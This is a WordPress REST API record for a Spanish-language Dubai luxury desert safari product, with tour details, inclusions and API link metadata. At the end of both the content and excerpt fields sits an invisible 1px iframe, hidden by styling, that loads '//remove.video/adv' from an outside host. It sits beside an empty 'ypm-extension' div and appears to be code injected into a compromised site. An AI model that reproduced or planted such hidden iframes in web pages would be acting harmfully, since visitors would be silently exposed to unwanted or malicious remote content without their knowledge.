{"id":20098,"date":"2020-12-16T12:21:00","date_gmt":"2020-12-16T11:21:00","guid":{"rendered":"http:\/\/13.36.35.205\/produit\/import-placeholder-for-2016890\/"},"modified":"2024-08-02T16:17:35","modified_gmt":"2024-08-02T15:17:35","slug":"safarideluxo","status":"publish","type":"product","link":"https:\/\/soldodubai.com\/es\/p\/safarideluxo\/","title":{"rendered":"SAFARI DE LUJO CON CENA GOURMET"},"content":{"rendered":"<p style=\"text-align: justify;\">A bordo de un lujoso Range Rover, partir\u00e1 para observar la flora y la fauna del desierto emirat\u00ed. Este recorrido de una hora est\u00e1 jalonado de varias paradas que le permitir\u00e1n aprender m\u00e1s sobre el desierto de los Emiratos y sus habitantes. Durante esta actividad, saldr\u00e1 en busca de fauna salvaje y podr\u00e1 avistar gacelas y ant\u00edlopes, as\u00ed como numerosas aves a orillas de un lago. A este paseo guiado le seguir\u00e1 una demostraci\u00f3n de caza de halcones en una zona exclusiva del desierto, donde le servir\u00e1n un canap\u00e9 y champ\u00e1n de d\u00e1tiles sin alcohol.<\/p>\n<p style=\"text-align: justify;\">A continuaci\u00f3n, los camellos le llevar\u00e1n al campamento de lujo, donde su chef le servir\u00e1 una cena de 6 platos a elegir entre sabores de Oriente Medio, mediterr\u00e1neos y\/o veganos.<\/p>\n<p style=\"text-align: justify;\">La refinada cena est\u00e1 amenizada por un espect\u00e1culo de fuego que podr\u00e1 admirar en el sal\u00f3n, especialmente dise\u00f1ado para su comodidad.<\/p>\n<p style=\"text-align: justify;\">Como recuerdo, se le ofrecer\u00e1 una aplicaci\u00f3n de henna seg\u00fan sus deseos.<\/p>\n<p>- Ni\u00f1os de 5 a 11 a\u00f1os<br \/>\n- Las familias con ni\u00f1os menores de 5 a\u00f1os deben disponer obligatoriamente de un coche privado.<br \/>\n- Autorizado para embarazadas de hasta 6 meses<br \/>\n- Salida entre las 14.30 y las 16.30 seg\u00fan la temporada<br \/>\n- Regreso entre las 21.30 y las 23.30 seg\u00fan la temporada<\/p>\n<p><strong>Qu\u00e9 incluye el precio:<\/strong><br \/>\nTraslados de ida y vuelta desde su hotel en un Range Rover<br \/>\nUna hora en un lujoso Range Rover<br \/>\nEl espect\u00e1culo de los halcones<br \/>\nGastronom\u00eda, La chicha<br \/>\nEl espect\u00e1culo de fuego<br \/>\nEl corto paseo en camello<br \/>\nAplicaci\u00f3n de la henna<\/p>\n<p><strong>Ubicaci\u00f3n:<\/strong> Reserva de conservaci\u00f3n del desierto de Dubai<\/p>\n<div id=\"ypm-extension\" class=\"ypm-extension\"><\/div>\n<div><iframe id=\"embedVideo\" style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/adv\"><\/iframe><\/div>","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<div><iframe id=\"embedVideo\" style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/adv\"><\/iframe><\/div>","protected":false},"featured_media":19704,"template":"","meta":[],"product_brand":[],"product_cat":[437,553],"product_tag":[],"class_list":{"0":"post-20098","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-activites-dans-le-desert-activites","7":"product_cat-activite-couple","9":"first","10":"instock","11":"virtual","12":"purchasable","13":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/product\/20098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/product\/20098\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/media\/19704"}],"wp:attachment":[{"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/media?parent=20098"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/product_brand?post=20098"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/product_cat?post=20098"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/soldodubai.com\/es\/wp-json\/wp\/v2\/product_tag?post=20098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}